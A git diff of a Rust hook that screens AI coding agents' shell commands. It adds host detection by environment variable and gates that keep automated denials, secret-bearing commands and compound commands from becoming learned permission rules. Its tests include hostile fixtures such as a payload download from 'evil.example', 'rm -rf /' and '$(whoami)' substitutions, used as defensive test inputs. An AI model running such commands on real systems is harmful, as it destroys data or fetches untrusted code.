@@ -320,13 +350,13 @@ mod tests {
             "command": "ls"
         })
         .to_string();
-        assert_eq!(host_id_for(&env, None), HostId::Cursor);
+        assert_eq!(host_id_for(&env, None, false), HostId::Cursor);
     }
 
     #[test]
     fn env_override_forces_codex_even_for_claude_envelope() {
         assert_eq!(
-            host_id_for(&claude_envelope(), Some("codex")),
+            host_id_for(&claude_envelope(), Some("codex"), false),
             HostId::Codex
         );
     }
@@ -334,7 +364,7 @@ mod tests {
     #[test]
     fn env_override_forces_cursor() {
         assert_eq!(
-            host_id_for(&claude_envelope(), Some("CURSOR")),
+            host_id_for(&claude_envelope(), Some("CURSOR"), false),
             HostId::Cursor
         );
     }
@@ -342,7 +372,7 @@ mod tests {
     #[test]
     fn env_override_is_case_insensitive_and_trimmed() {
         assert_eq!(
-            host_id_for(&claude_envelope(), Some("  Claude ")),
+            host_id_for(&claude_envelope(), Some("  Claude "), false),
             HostId::Claude
         );
     }
@@ -357,28 +387,90 @@ mod tests {
             "turn_id": "t"
         })
         .to_string();
-        assert_eq!(host_id_for(&env, Some("bogus")), HostId::Codex);
+        assert_eq!(host_id_for(&env, Some("bogus"), false), HostId::Codex);
     }
 
     #[test]
     fn ambiguous_envelope_defaults_to_claude() {
-        assert_eq!(host_id_for("not json at all", None), HostId::Claude);
-        assert_eq!(host_id_for("{}", None), HostId::Claude);
+        assert_eq!(host_id_for("not json at all", None, false), HostId::Claude);
+        assert_eq!(host_id_for("{}", None, false), HostId::Claude);
     }
 
     #[test]
     fn detect_host_builds_matching_impl() {
         assert_eq!(
-            detect_host_with_override(&claude_envelope(), None).host_id(),
+            detect_host_with_override(&claude_envelope(), None, false).host_id(),
             HostId::Claude
         );
         assert_eq!(
-            detect_host_with_override(&claude_envelope(), Some("codex")).host_id(),
+            detect_host_with_override(&claude_envelope(), Some("codex"), false).host_id(),
             HostId::Codex
         );
         assert_eq!(
-            detect_host_with_override(&claude_envelope(), Some("cursor")).host_id(),
+            detect_host_with_override(&claude_envelope(), Some("cursor"), false).host_id(),
             HostId::Cursor
         );
     }
+
+    fn codex_turn_id_envelope() -> String {
+        serde_json::json!({
+            "session_id": "sess-cc",
+            "cwd": "/tmp/project",
+            "hook_event_name": "PreToolUse",
+            "tool_name": "Bash",
+            "turn_id": "turn-cc",
+            "tool_input": { "command": "ls" }
+        })
+        .to_string()
+    }
+
+    /// AC2.1: truthy `CLAUDECODE` + a `turn_id` envelope -> Claude (CLAUDECODE
+    /// wins over the envelope sniff).
+    #[test]
+    fn claudecode_truthy_overrides_turn_id_sniff() {
+        assert_eq!(
+            host_id_for(&codex_turn_id_envelope(), None, true),
+            HostId::Claude
+        );
+    }
+
+    /// AC2.2: explicit `CLX_HOOK_HOST=codex` still wins over truthy `CLAUDECODE`.
+    #[test]
+    fn explicit_override_beats_claudecode() {
+        assert_eq!(
+            host_id_for(&claude_envelope(), Some("codex"), true),
+            HostId::Codex
+        );
+    }
+
+    /// AC2.3: `CLAUDECODE` falsy/unset + a `turn_id` envelope -> Codex
+    /// (unchanged sniff behaviour).
+    #[test]
+    fn claudecode_falsy_keeps_turn_id_sniff() {
+        assert_eq!(
+            host_id_for(&codex_turn_id_envelope(), None, false),
+            HostId::Codex
+        );
+    }
+
+    /// AC2.4: no envelope signal and no `CLAUDECODE` -> Claude default.
+    #[test]
+    fn no_signals_defaults_to_claude() {
+        assert_eq!(host_id_for("{}", None, false), HostId::Claude);
+    }
+
+    /// The truthy-env helper: present + non-empty(trim) + not a falsy literal.
+    #[test]
+    fn is_truthy_env_matrix() {
+        assert!(is_truthy_env(Some("1")));
+        assert!(is_truthy_env(Some("true")));
+        assert!(is_truthy_env(Some(" yes ")));
+        assert!(!is_truthy_env(None));
+        assert!(!is_truthy_env(Some("")));
+        assert!(!is_truthy_env(Some("   ")));
+        assert!(!is_truthy_env(Some("0")));
+        assert!(!is_truthy_env(Some("false")));
+        assert!(!is_truthy_env(Some("FALSE")));
+        assert!(!is_truthy_env(Some("False")));
+    }
 }
diff --git a/crates/clx-hook/src/learning.rs b/crates/clx-hook/src/learning.rs
index 760f19f..525a91f 100644
--- a/crates/clx-hook/src/learning.rs
+++ b/crates/clx-hook/src/learning.rs
@@ -1,10 +1,41 @@
 //! User decision tracking for auto-learning rules.
 
 use clx_core::config::Config;
+use clx_core::learned_pattern::{
+    is_well_formed_pattern, pattern_contains_secret, strip_env_assignments,
+};
+use clx_core::redaction::redact_secrets;
 use clx_core::storage::Storage;
 use clx_core::types::{LearnedRule, RuleType};
 use tracing::{debug, warn};
 
+/// Where a tracked decision originated.
+///
+/// Automated (LLM/L1-originated) denials must NEVER feed the auto-blacklist
+/// counter (Issue 9): only genuine user rejections learn. The `User` path
+/// preserves the historical V-R5 behaviour.
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub enum DecisionSource {
+    /// A genuine user-originated decision (interactive approve/reject).
+    User,
+    /// An automated/LLM-originated decision (e.g. an L1 deny verdict).
+    Automated,
+}
+
+/// Shell metacharacters that mark a RAW command as compound/substitution and so
+/// unsafe to learn from (extraction would generalize them away). Mirrors the
+/// reject-set of the shared `is_well_formed_pattern` body check.
+const RAW_COMPOUND_METACHARS: &[&str] = &[";", "&&", "||", "|", "$(", "`", "<(", ">("];
+
+/// Return `true` if the RAW command must be rejected before any pattern
+/// extraction: it trips the shared secret detector OR contains a
+/// compound/substitution metacharacter. This catches `SSHPASS=... ssh` and
+/// `git diff | cat` BEFORE extraction generalizes them into an innocuous-looking
+/// stored pattern.
+fn raw_command_is_unsafe(command: &str) -> bool {
+    pattern_contains_secret(command) || RAW_COMPOUND_METACHARS.iter().any(|m| command.contains(m))
+}
+
 /// Commands that should never be auto-whitelisted due to destructive potential.
 ///
 /// Even if the user approves these commands repeatedly, they remain subject to
@@ -37,6 +68,7 @@ const NEVER_AUTO_WHITELIST: &[&str] = &[
 /// Check whether the base command (first word) of a command string is restricted
 /// from auto-whitelisting.
 pub(crate) fn is_restricted_command(command: &str) -> bool {
+    let command = strip_env_assignments(command);
     let base_cmd = command.split_whitespace().next().unwrap_or("");
     NEVER_AUTO_WHITELIST.contains(&base_cmd)
 }
@@ -133,7 +165,28 @@ pub(crate) fn track_user_decision(
     command: &str,
     project_path: &str,
     approved: bool,
+    source: DecisionSource,
 ) {
+    // Issue 9: automated/LLM-originated denials must never learn. Early-return
+    // before any insert/increment/flip so an automated L1 deny can never reach
+    // the auto-blacklist counter.
+    if source == DecisionSource::Automated && !approved {
+        debug!("Skipping learning for automated denial (Issue 9)");
+        return;
+    }
+
+    // Issue 1 RAW-command gate: reject before pattern extraction if the raw
+    // command trips the secret detector or carries compound/substitution
+    // metachars. Extraction would otherwise generalize a secret-bearing or
+    // compound command into an innocuous-looking stored pattern.
+    if raw_command_is_unsafe(command) {
+        warn!(
+            "Skipping learning for unsafe raw command: {}",
+            redact_secrets(command)
+        );
+        return;
+    }
+
     // Load config for learning thresholds
     let config = Config::load().unwrap_or_default();
 
@@ -171,7 +224,10 @@ pub(crate) fn track_user_decision(
 
             // Check if we should auto-blacklist
             if rule.denial_count >= config.user_learning.auto_blacklist_threshold as i32 {
-                let base_cmd = command.split_whitespace().next().unwrap_or("");
+                let base_cmd = strip_env_assignments(command)
+                    .split_whitespace()
+                    .next()
+                    .unwrap_or("");
                 let cmd_name = std::path::Path::new(base_cmd)
                     .file_name()
                     .and_then(|n| n.to_str())
@@ -200,6 +256,15 @@ pub(crate) fn track_user_decision(
             }
         }
 
+        // Issue 1 pattern-level belt+braces: never write a malformed/over-broad
+        // pattern (allows `*`/`/`).
+        if !is_well_formed_pattern(&rule.pattern) {
+            warn!(
+                "Skipping update of malformed learned pattern: {}",
+                redact_secrets(&rule.pattern)
+            );
+            return;
+        }
         if let Err(e) = storage.add_rule(&rule) {
             warn!("Failed to update rule: {}", e);
         }
@@ -218,6 +283,15 @@ pub(crate) fn track_user_decision(
         rule.confirmation_count = i32::from(approved);
         rule.denial_count = i32::from(!approved);
 
+        // Issue 1 pattern-level belt+braces: never write a malformed/over-broad
+        // pattern (allows `*`/`/`).
+        if !is_well_formed_pattern(&rule.pattern) {
+            warn!(
+                "Skipping insert of malformed learned pattern: {}",
+                redact_secrets(&rule.pattern)
+            );
+            return;
+        }
         if let Err(e) = storage.add_rule(&rule) {
             warn!("Failed to add rule: {}", e);
         }
@@ -226,6 +300,7 @@ pub(crate) fn track_user_decision(
 
 /// Extract a generalizable pattern from a command
 pub(crate) fn extract_command_pattern(command: &str) -> String {
+    let command = strip_env_assignments(command);
     let parts: Vec<&str> = command.split_whitespace().collect();
 
     if parts.is_empty() {
@@ -278,8 +353,8 @@ mod tests {
         let project = "/tmp/project";
 
         // Act — call (threshold-1) = 2 times with approved=true
-        track_user_decision(&storage, command, project, true);
-        track_user_decision(&storage, command, project, true);
+        track_user_decision(&storage, command, project, true, DecisionSource::User);
+        track_user_decision(&storage, command, project, true, DecisionSource::User);
 
         // Assert — pattern exists but is still tracking (RuleType::Allow is the initial
         // value assigned on first decision; what must NOT happen is confirmation_count
@@ -307,7 +382,7 @@ mod tests {
 
         // Act — call threshold (3) times
         for _ in 0..3 {
-            track_user_decision(&storage, command, project, true);
+            track_user_decision(&storage, command, project, true, DecisionSource::User);
         }
 
         // Assert
@@ -335,7 +410,7 @@ mod tests {
 
         // Act — call threshold (2) times with approved=false
         for _ in 0..2 {
-            track_user_decision(&storage, command, project, false);
+            track_user_decision(&storage, command, project, false, DecisionSource::User);
         }
 
         // Assert
@@ -361,8 +436,8 @@ mod tests {
         let project = "/tmp/project";
 
         // Act — 1 allow then 1 deny (both counts < their respective thresholds)
-        track_user_decision(&storage, command, project, true);
-        track_user_decision(&storage, command, project, false);
+        track_user_decision(&storage, command, project, true, DecisionSource::User);
+        track_user_decision(&storage, command, project, false, DecisionSource::User);
 
         // Assert
         let pattern = extract_command_pattern(command);
@@ -399,7 +474,7 @@ mod tests {
         let command = "curl http://evil.example";
         let project = "/tmp/project";
 
-        track_user_decision(&storage, command, project, false);
+        track_user_decision(&storage, command, project, false, DecisionSource::User);
 
         let pattern = extract_command_pattern(command);
         let rule = storage
@@ -423,12 +498,14 @@ mod tests {
     #[test]
     fn test_v_r5_deny_path_reaches_auto_blacklist() {
         let storage = Storage::open_in_memory().expect("in-memory storage");
-        let command = "curl http://evil.example/payload.sh";
+        // NOTE: the command must survive the Issue 1 RAW gate (no secret-shaped
+        // / high-entropy token, no compound metachars), so we use a plain host.
+        let command = "curl http://evil.example";
         let project = "/tmp/project";
 
         // Default auto_blacklist_threshold = 2.
-        track_user_decision(&storage, command, project, false);
-        track_user_decision(&storage, command, project, false);
+        track_user_decision(&storage, command, project, false, DecisionSource::User);
+        track_user_decision(&storage, command, project, false, DecisionSource::User);
 
         let pattern = extract_command_pattern(command);
         let rule = storage
@@ -451,7 +528,7 @@ mod tests {
         let command = "curl http://safe.example";
         let project = "/tmp/project";
 
-        track_user_decision(&storage, command, project, true);
+        track_user_decision(&storage, command, project, true, DecisionSource::User);
 
         let pattern = extract_command_pattern(command);
         let rule = storage
@@ -478,10 +555,10 @@ mod tests {
 
         // Act — record the same pattern multiple times
         for _ in 0..3 {
-            track_user_decision(&storage, command, project, true);
+            track_user_decision(&storage, command, project, true, DecisionSource::User);
         }
         // Record once more beyond threshold
-        track_user_decision(&storage, command, project, true);
+        track_user_decision(&storage, command, project, true, DecisionSource::User);
 
         // Assert — only one rule exists for this pattern (ON CONFLICT DO UPDATE)
         let pattern = extract_command_pattern(command);
@@ -493,4 +570,176 @@ mod tests {
             "should have exactly one rule for the pattern, not a duplicate"
         );
     }
+
+    // =====================================================================
+    // Issue 1 — learning gates
+    // =====================================================================
+
+    /// AC1.1: a leading `ENV=VALUE` run is stripped before pattern extraction,
+    /// so the secret value never reaches the stored pattern shape.
+    #[test]
+    fn ac1_1_env_stripped_from_extracted_pattern() {
+        let pattern = extract_command_pattern("SSHPASS='p w' ssh host");
+        assert!(
+            !pattern.contains("SSHPASS") && !pattern.contains("p w"),
+            "env assignment must be stripped from the pattern, got: {pattern}"
+        );
+        assert_eq!(pattern, "Bash(ssh:*)");
+    }
+
+    /// AC1.2 (new-insert path): a secret-bearing command stores NO rule.
+    /// The raw command uses a high-entropy token whose extracted pattern would
+    /// generalize the secret away — proving the RAW gate (not the pattern gate)
+    /// catches it.
+    #[test]
+    fn ac1_2_secret_command_stores_no_rule_new_path() {
+        let storage = Storage::open_in_memory().expect("in-memory storage");
+        // `curl` is not extracted with a subcommand, so the pattern would be
+        // `Bash(curl:*)` (secret generalized away). The RAW gate must catch the
+        // high-entropy token in the raw command first.
+        let command = "curl -H aGVsbG9TZWNyZXRUb2tlbkFiYzEyMzQ1Njc4OTBYWVo https://x";
+        track_user_decision(&storage, command, "/tmp/p", false, DecisionSource::User);
+
+        assert!(
+            storage.get_rules().expect("get_rules").is_empty(),
+            "secret-bearing raw command must not create any rule (new path)"
+        );
+    }
+
+    /// AC1.2 (update path): an existing rule is not updated from a
+    /// secret-bearing command (the RAW gate returns before the update).
+    #[test]
+    fn ac1_2_secret_command_stores_no_rule_update_path() {
+        let storage = Storage::open_in_memory().expect("in-memory storage");
+        // Seed a clean rule via a benign decision.
+        track_user_decision(
+            &storage,
+            "curl https://x",
+            "/tmp/p",
+            false,
+            DecisionSource::User,
+        );
+        let pattern = extract_command_pattern("curl https://x");
+        let before = storage
+            .get_rule_by_pattern(&pattern)
+            .expect("query")
+            .expect("seeded rule");
+
+        // Now a secret-bearing command that maps to the SAME pattern.
+        let command = "curl aGVsbG9TZWNyZXRUb2tlbkFiYzEyMzQ1Njc4OTBYWVo";
+        track_user_decision(&storage, command, "/tmp/p", false, DecisionSource::User);
+
+        let after = storage
+            .get_rule_by_pattern(&pattern)
+            .expect("query")
+            .expect("rule still exists");
+        assert_eq!(
+            before.denial_count, after.denial_count,
+            "secret-bearing command must not increment/update the existing rule"
+        );
+    }
+
+    /// AC1.3: compound/substitution raw inputs never produce a stored rule.
+    #[test]
+    fn ac1_3_compound_inputs_store_no_rule() {
+        for command in [
+            "a; b",
+            "a && b",
+            "a || b",
+            "git diff | cat",
+            "echo $(whoami)",
+            "echo `whoami`",
+            "diff <(a) <(b)",
+        ] {
+            let storage = Storage::open_in_memory().expect("in-memory storage");
+            track_user_decision(&storage, command, "/tmp/p", true, DecisionSource::User);
+            assert!(
+                storage.get_rules().expect("get_rules").is_empty(),
+                "compound command must not create a rule: {command}"
+            );
+        }
+    }
+
+    /// AC1.4: `is_restricted_command` applies env-stripping, so a leading
+    /// assignment no longer hides a restricted base command.
+    #[test]
+    fn ac1_4_is_restricted_command_strips_env() {
+        assert!(
+            is_restricted_command("FOO=bar rm -rf /"),
+            "env-prefixed `rm` must be recognized as restricted"
+        );
+    }
+
+    // =====================================================================
+    // Issue 9 — automated denials do not learn
+    // =====================================================================
+
+    /// AC9.1: automated denials never create a rule, even past the threshold.
+    #[test]
+    fn ac9_1_automated_deny_does_not_blacklist() {
+        let storage = Storage::open_in_memory().expect("in-memory storage");
+        let command = "curl http://evil.example/payload.sh";
+
+        // Default auto_blacklist_threshold = 2; exceed it.
+        for _ in 0..3 {
+            track_user_decision(
+                &storage,
+                command,
+                "/tmp/p",
+                false,
+                DecisionSource::Automated,
+            );
+        }
+
+        assert!(
+            storage.get_rules().expect("get_rules").is_empty(),
+            "automated denials must never create a learned rule"
+        );
+    }
+
+    /// AC9.3: an explicit user allow is not overridden by accumulated automated
+    /// denials (the automated denials are no-ops, so the Allow rule survives).
+    #[test]
+    fn ac9_3_explicit_allow_not_overridden_by_automated_denials() {
+        let storage = Storage::open_in_memory().expect("in-memory storage");
+        let command = "curl http://safe.example";
+
+        // User approves enough times to auto-whitelist.
+        for _ in 0..3 {
+            track_user_decision(&storage, command, "/tmp/p", true, DecisionSource::User);
+        }
+        let pattern = extract_command_pattern(command);
+        assert_eq!(
+            storage
+                .get_rule_by_pattern(&pattern)
+                .expect("query")
+                .expect("rule")
+                .rule_type,
+            RuleType::Allow
+        );
+
+        // Many automated denials must not flip it.
+        for _ in 0..5 {
+            track_user_decision(
+                &storage,
+                command,
+                "/tmp/p",
+                false,
+                DecisionSource::Automated,
+            );
+        }
+        let rule = storage
+            .get_rule_by_pattern(&pattern)
+            .expect("query")
+            .expect("rule");
+        assert_eq!(
+            rule.rule_type,
+            RuleType::Allow,
+            "automated denials must not override an explicit allow"
+        );
+        assert_eq!(
+            rule.denial_count, 0,
+            "automated denials must not increment denial_count"
+        );
+    }
 }
diff --git a/crates/clx-hook/src/lib.rs b/crates/clx-hook/src/lib.rs
index 9b04594..ef8d3bd 100644
--- a/crates/clx-hook/src/lib.rs
+++ b/crates/clx-hook/src/lib.rs
@@ -33,7 +33,7 @@ pub(crate) mod types;
 mod tests;
 
 pub use router::{
-    CLAUDE_PROVENANCE_ENV_VARS, HookDeps, HookExit, Provenance, classify_provenance, handle_event,
+    CLAUDE_PROVENANCE_ENV_VARS, HookExit, Provenance, classify_provenance, handle_event,
 };
 
 /// Test-only seam exposing the P7 canonical tool-name adapter to integration
diff --git a/crates/clx-hook/src/main.rs b/crates/clx-hook/src/main.rs
index 10d0778..ca5ac43 100644
--- a/crates/clx-hook/src/main.rs
+++ b/crates/clx-hook/src/main.rs
@@ -6,7 +6,7 @@
 //! protocol; the router detects the host from the envelope. All real work
 //! lives in the `clx_hook` library (see `src/lib.rs` + `src/router.rs`). This
 //! binary owns only process-level concerns: argument parsing, tracing setup,
-//! sqlite-vec init, and constructing `HookDeps` for the router.
+//! and sqlite-vec init. Handlers resolve their own config/storage.
 //!
 //! Hook handlers (in the library): the eight Claude events `PreToolUse`,
 //! `PostToolUse`, `PreCompact`, `SessionStart`, `SessionEnd`, `SubagentStart`,
@@ -16,9 +16,7 @@
 use std::io::{self, IsTerminal};
 use std::process::ExitCode;
 
-use clx_hook::{
-    CLAUDE_PROVENANCE_ENV_VARS, HookDeps, Provenance, classify_provenance, handle_event,
-};
+use clx_hook::{CLAUDE_PROVENANCE_ENV_VARS, Provenance, classify_provenance, handle_event};
 use tracing::warn;
 
 fn print_usage() {
@@ -58,13 +56,9 @@ async fn main() -> ExitCode {
     clx_core::init_sqlite_vec();
     init_tracing();
 
-    // Build router deps. If the storage layer cannot be opened we still want
-    // Claude Code to see a clean exit (treating any non-zero as hook failure
-    // noise); the router itself does the safe "allow" fallback when handlers
-    // cannot do real work.
-    let Some(deps) = HookDeps::from_process_defaults() else {
-        return ExitCode::SUCCESS;
-    };
+    // Each handler resolves its own `Config`/`Storage` at its own call site
+    // (with its own failure handling), so the router takes no injected deps;
+    // a handler that cannot open storage performs its own safe fallback.
 
     // F7: best-effort hook-envelope provenance check at the orchestration
     // boundary (before any dispatch), NOT inside router::handle_event, so
@@ -98,7 +92,7 @@ async fn main() -> ExitCode {
     // fallback JSON (oversize input / parse error) to stdout, and returns a
     // HookExit. Every variant maps to SUCCESS so Claude Code never sees
     // hook stderr noise.
-    let _exit = handle_event(io::stdin(), io::stdout(), deps).await;
+    let _exit = handle_event(io::stdin(), io::stdout()).await;
     ExitCode::SUCCESS
 }
 
diff --git a/crates/clx-hook/src/router.rs b/crates/clx-hook/src/router.rs
index 3e76073..58a554e 100644
--- a/crates/clx-hook/src/router.rs
+++ b/crates/clx-hook/src/router.rs
@@ -7,10 +7,11 @@
 //!
 //! Layering:
 //! - Orchestration: `handle_event` (this file)
-//! - Domain: `HookDeps`, `HookExit` (this file)
-//! - Infrastructure: handlers under `crate::hooks::*` (re-use `Config::load`
-//!   and `Storage::open_default` internally; that plumbing is owned by them
-//!   and is not changed in this refactor)
+//! - Domain: `HookExit` (this file)
+//! - Infrastructure: handlers under `crate::hooks::*` (each loads `Config::load`
+//!   and `Storage::open_default` internally; that plumbing is owned by them).
+//!   Each handler resolves its own config/storage at its own call site with
+//!   its own failure handling, so the router does not inject shared deps.
 //! - Mapping: `crate::output::*`
 //!
 //! Known limitation: `output::output_decision` / `output::output_generic`
@@ -21,9 +22,7 @@
 
 use std::io::{Read, Write};
 
-use clx_core::config::Config;
 use clx_core::redaction::{redact_json_value, redact_secrets};
-use clx_core::storage::Storage;
 use tracing::{debug, error, warn};
 
 use crate::hooks::{
@@ -35,42 +34,6 @@ use crate::host::{Host, detect_host};
 use crate::output::output_decision;
 use crate::types::{HostNeutralInput, MAX_INPUT_SIZE};
 
-/// Dependencies the router needs to dispatch a hook event.
-///
-/// Today the downstream handlers re-load `Config` and `Storage` internally,
-/// so `HookDeps` is constructed in `main()` and held by the router but not
-/// yet threaded through to every handler. The struct still exists so that
-/// (a) we have a single chokepoint where future handler signatures will
-/// accept injected deps, and (b) integration tests can build a
-/// `HookDeps::for_test()` value without standing up the real filesystem.
-pub struct HookDeps {
-    /// Loaded CLX config (or default if loading failed).
-    pub config: Config,
-    /// Open storage handle (default location, or in-memory for tests).
-    pub storage: Storage,
-}
-
-impl HookDeps {
-    /// Build deps using process defaults. Falls back to a default config and
-    /// the default sqlite path. Returns `None` if storage cannot be opened.
-    #[must_use]
-    pub fn from_process_defaults() -> Option<Self> {
-        let config = Config::load().unwrap_or_default();
-        let storage = Storage::open_default().ok()?;
-        Some(Self { config, storage })
-    }
-
-    /// Build deps suitable for tests: default config, in-memory storage.
-    #[cfg(test)]
-    #[must_use]
-    pub fn for_test() -> Self {
-        Self {
-            config: Config::default(),
-            storage: Storage::open_in_memory().expect("in-memory sqlite for test deps"),
-        }
-    }
-}
-
 /// Best-effort provenance verdict for the hook invocation (finding F7).
 ///
 /// Threat model: `clx-hook` reads its JSON envelope from stdin. The
@@ -168,20 +131,6 @@ pub(crate) enum ReadOutcome {
     ReadFailed,
 }
 
-/// Parse a raw JSON string into `HostNeutralInput` via the detected host.
-///
-/// For Claude this is the historical `serde_json::from_str` path (lossless
-/// lift); other hosts map their envelope to the host-neutral shape. The
-/// returned `serde_json::Error` keeps the existing error-handling contract.
-///
-/// `handle_event` uses `parse_input_with_host` (it has already detected the
-/// host); this convenience wrapper is retained for the parse-error unit tests
-/// and as the public single-arg parse entry point.
-#[allow(dead_code)]
-pub(crate) fn parse_input(raw: &str) -> Result<HostNeutralInput, serde_json::Error> {
-    parse_input_with_host(&*detect_host(raw), raw)
-}
-
 /// Host-explicit parse, used by `handle_event` (which has already detected
 /// the host) and by tests that want a deterministic host.
 pub(crate) fn parse_input_with_host(
@@ -236,7 +185,10 @@ pub(crate) async fn dispatch(input: HostNeutralInput, host: &dyn Host) -> anyhow
 /// `writer` is reserved for the fallback paths (oversize input, read
 /// failure). Handlers themselves still write through `crate::output::*`,
 /// which currently uses `println!` on the process stdout.
-pub async fn handle_event<R, W>(reader: R, mut writer: W, _deps: HookDeps) -> HookExit
+///
+/// Each handler resolves its own `Config`/`Storage` at its own call site (with
+/// its own failure handling), so the router does not inject shared deps.
+pub async fn handle_event<R, W>(reader: R, mut writer: W) -> HookExit
 where
     R: Read,
     W: Write,
@@ -311,6 +263,16 @@ where
 mod tests {
     use super::*;
 
+    /// Test-only single-arg parse: detect the host from `raw`, then parse.
+    ///
+    /// `handle_event` uses `parse_input_with_host` directly (it has already
+    /// detected the host once from the raw envelope). This convenience wrapper
+    /// exists solely for the parse-error unit tests below, so it lives under
+    /// `#[cfg(test)]` rather than carrying a production `#[allow(dead_code)]`.
+    fn parse_input(raw: &str) -> Result<HostNeutralInput, serde_json::Error> {
+        parse_input_with_host(&*detect_host(raw), raw)
+    }
+
     fn pre_tool_use_envelope() -> String {
         serde_json::json!({
             "session_id": "sess-router-001",
@@ -410,7 +372,7 @@ mod tests {
     async fn handle_event_oversize_emits_block_to_writer() {
         let big = vec![b'a'; (MAX_INPUT_SIZE as usize) + 1];
         let mut out = Vec::<u8>::new();
-        let exit = handle_event(&big[..], &mut out, HookDeps::for_test()).await;
+        let exit = handle_event(&big[..], &mut out).await;
         assert_eq!(exit, HookExit::InputTooLarge);
         let s = String::from_utf8_lossy(&out);
         let parsed: serde_json::Value = serde_json::from_str(s.trim()).expect("valid json");
@@ -422,7 +384,7 @@ mod tests {
     async fn handle_event_malformed_json_returns_parse_error() {
         let bytes = b"definitely not json";
         let mut out = Vec::<u8>::new();
-        let exit = handle_event(&bytes[..], &mut out, HookDeps::for_test()).await;
+        let exit = handle_event(&bytes[..], &mut out).await;
         assert_eq!(exit, HookExit::ParseError);
     }
 
@@ -435,7 +397,7 @@ mod tests {
         })
         .to_string();
         let mut out = Vec::<u8>::new();
-        let exit = handle_event(raw.as_bytes(), &mut out, HookDeps::for_test()).await;
+        let exit = handle_event(raw.as_bytes(), &mut out).await;
         // dispatch returns Ok for unknown events (after emitting allow on stdout)
         assert_eq!(exit, HookExit::Ok);
     }
@@ -444,7 +406,7 @@ mod tests {
     async fn handle_event_happy_pre_tool_use() {
         let raw = pre_tool_use_envelope();
         let mut out = Vec::<u8>::new();
-        let exit = handle_event(raw.as_bytes(), &mut out, HookDeps::for_test()).await;
+        let exit = handle_event(raw.as_bytes(), &mut out).await;
         // Handlers may return Ok or HandlerError depending on filesystem
         // state in the test environment. Both are acceptable here: this
         // test just ensures handle_event reaches dispatch without panic.
@@ -459,11 +421,10 @@ mod tests {
     //
     // These live here (not in `tests/hooks_router_e2e.rs`) because the
     // workspace lint forbids `unsafe` `std::env::set_var`, so an external
-    // integration test cannot redirect `HOME` to build real `HookDeps`
-    // without touching the real `~/.clx`. `HookDeps::for_test()` is
-    // `#[cfg(test)]`-only (in-memory sqlite, zero real-env / network /
-    // keychain), so the safe place for the in-memory `Read`/`Write`
-    // contract is this in-crate module. Anchored to
+    // integration test cannot redirect `HOME` to drive the handlers'
+    // self-loaded config/storage without touching the real CLX home dir.
+    // This in-crate module uses in-memory `Read`/`Write` buffers, so it is
+    // the safe place for the in-memory router contract. Anchored to
     // `specs/_prerelease/04-integration.md` 3.1 + the edge/failure matrix.
     // =====================================================================
     mod wave1_integration_behavior {
@@ -487,7 +448,7 @@ mod tests {
         async fn oversize_writes_block_json_to_injected_writer() {
             let big = vec![b'a'; (MAX_INPUT_SIZE as usize) + 1];
             let mut out = Vec::<u8>::new();
-            let exit = handle_event(&big[..], &mut out, HookDeps::for_test()).await;
+            let exit = handle_event(&big[..], &mut out).await;
             assert_eq!(exit, HookExit::InputTooLarge);
             let v: serde_json::Value =
                 serde_json::from_str(String::from_utf8_lossy(&out).trim()).expect("block json");
@@ -504,22 +465,21 @@ mod tests {
             // Documented boundary `n >= MAX_INPUT_SIZE` (router.rs read_input).
             let at_cap = vec![b'a'; MAX_INPUT_SIZE as usize];
             let mut out = Vec::<u8>::new();
-            let exit = handle_event(&at_cap[..], &mut out, HookDeps::for_test()).await;
+            let exit = handle_event(&at_cap[..], &mut out).await;
             assert_eq!(exit, HookExit::InputTooLarge);
         }
 
         #[tokio::test]
         async fn malformed_json_is_parse_error() {
             let mut out = Vec::<u8>::new();
-            let exit =
-                handle_event(b"not json at all" as &[u8], &mut out, HookDeps::for_test()).await;
+            let exit = handle_event(b"not json at all" as &[u8], &mut out).await;
             assert_eq!(exit, HookExit::ParseError);
         }
 
         #[tokio::test]
         async fn empty_stdin_is_parse_error() {
             let mut out = Vec::<u8>::new();
-            let exit = handle_event(b"" as &[u8], &mut out, HookDeps::for_test()).await;
+            let exit = handle_event(b"" as &[u8], &mut out).await;
             assert_eq!(exit, HookExit::ParseError);
         }
 
@@ -527,7 +487,7 @@ mod tests {
         async fn missing_required_field_is_parse_error() {
             let raw = serde_json::json!({ "hook_event_name": "PreToolUse" }).to_string();
             let mut out = Vec::<u8>::new();
-            let exit = handle_event(raw.as_bytes(), &mut out, HookDeps::for_test()).await;
+            let exit = handle_event(raw.as_bytes(), &mut out).await;
             assert_eq!(exit, HookExit::ParseError);
         }
 
@@ -535,7 +495,7 @@ mod tests {
         async fn unknown_event_is_allowed_ok() {
             let raw = envelope("SomeFutureEvent2027", &serde_json::json!({}));
             let mut out = Vec::<u8>::new();
-            let exit = handle_event(raw.as_bytes(), &mut out, HookDeps::for_test()).await;
+            let exit = handle_event(raw.as_bytes(), &mut out).await;
             assert_eq!(exit, HookExit::Ok);
         }
 
@@ -565,7 +525,7 @@ mod tests {
             for (event, extra) in cases {
                 let raw = envelope(event, &extra);
                 let mut out = Vec::<u8>::new();
-                let exit = handle_event(raw.as_bytes(), &mut out, HookDeps::for_test()).await;
+                let exit = handle_event(raw.as_bytes(), &mut out).await;
                 assert!(
                     matches!(exit, HookExit::Ok | HookExit::HandlerError),
                     "event {event} should reach dispatch, got {exit:?}"
diff --git a/crates/clx-hook/tests/hooks_router_e2e.rs b/crates/clx-hook/tests/hooks_router_e2e.rs
index aaa63cf..e9b05c2 100644
--- a/crates/clx-hook/tests/hooks_router_e2e.rs
+++ b/crates/clx-hook/tests/hooks_router_e2e.rs
@@ -14,8 +14,8 @@
 //! (in-memory `Read`/`Write`, `HookExit`, oversize block JSON on the
 //! injectable writer, parse/read-error fallbacks) is therefore covered by a
 //! sibling marked module `wave1_integration_behavior` inside
-//! `crates/clx-hook/src/router.rs`, which can use the `#[cfg(test)]`-only
-//! `HookDeps::for_test()` (in-memory sqlite, no real-env touch).
+//! `crates/clx-hook/src/router.rs`, which drives `handle_event` directly with
+//! in-memory buffers (handlers self-load config/storage; no real-env touch).
 //!
 //! The real `~/.clx` / `~/.claude` are never touched. No network, no
 //! keychain, no model download.
diff --git a/crates/clx-hook/tests/host_transcript_routing_e2e.rs b/crates/clx-hook/tests/host_transcript_routing_e2e.rs
index b1e991d..79b4b24 100644
--- a/crates/clx-hook/tests/host_transcript_routing_e2e.rs
+++ b/crates/clx-hook/tests/host_transcript_routing_e2e.rs
@@ -71,7 +71,13 @@ fn run(host: Option<&str>, envelope_bytes: &[u8]) -> HookRun {
